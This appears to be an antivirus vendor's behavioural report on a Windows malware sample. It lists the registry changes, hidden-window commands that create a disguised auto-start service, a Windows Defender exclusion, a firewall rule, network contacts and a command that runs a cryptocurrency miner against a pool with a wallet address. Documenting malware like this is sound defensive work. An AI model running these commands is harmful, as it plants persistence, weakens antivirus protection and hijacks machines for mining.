Technical Information
- [<HKLM>\System\CurrentControlSet\Services\rcuxgoti] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\rcuxgoti] 'ImagePath' = '%WINDIR%\SysWOW64\rcuxgoti\afpkeqnp.exe /d"<Full path to file>"'
- [<HKLM>\SYSTEM\CurrentControlSet\services\rcuxgoti] 'ImagePath' = '%WINDIR%\SysWOW64\rcuxgoti\afpkeqnp.exe'
- 'rcuxgoti' %WINDIR%\SysWOW64\rcuxgoti\afpkeqnp.exe /d"<Full path to file>"
- 'rcuxgoti' %WINDIR%\SysWOW64\rcuxgoti\afpkeqnp.exe
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\SysWOW64\rcuxgoti' = '00000000'
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul
- %WINDIR%\syswow64\svchost.exe
- %TEMP%\afpkeqnp.exe
- %WINDIR%\syswow64\config\systemprofile:.repos
- from %TEMP%\afpkeqnp.exe to %WINDIR%\syswow64\rcuxgoti\afpkeqnp.exe
- 'mi##########m.mail.protection.outlook.com':25
- '43.#31.4.7':443
- DNS ASK mi##########m.mail.protection.outlook.com
- DNS ASK 19#.###.211.95.in-addr.arpa
- '%WINDIR%\syswow64\rcuxgoti\afpkeqnp.exe' /d"<Full path to file>"
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\rcuxgoti\' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\afpkeqnp.exe" %WINDIR%\SysWOW64\rcuxgoti\' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' create rcuxgoti binPath= "%WINDIR%\SysWOW64\rcuxgoti\afpkeqnp.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' description rcuxgoti "wifi internet conection"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' start rcuxgoti' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\rcuxgoti\
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\afpkeqnp.exe" %WINDIR%\SysWOW64\rcuxgoti\
- '%WINDIR%\syswow64\sc.exe' create rcuxgoti binPath= "%WINDIR%\SysWOW64\rcuxgoti\afpkeqnp.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"
- '%WINDIR%\syswow64\sc.exe' description rcuxgoti "wifi internet conection"
- '%WINDIR%\syswow64\sc.exe' start rcuxgoti
- '%WINDIR%\syswow64\svchost.exe'
- '%WINDIR%\syswow64\svchost.exe' -o msr.pool-pay.com:6199 -u 9jNvTpsSutBLodbiiRngN2S4AfM84WJ4Y8zRpo6H4QPBK625huByLqkiCTh5Uog1qHVBr7cyZfbA1GiiPqSsSv83HAiirSf.50000 -p x -k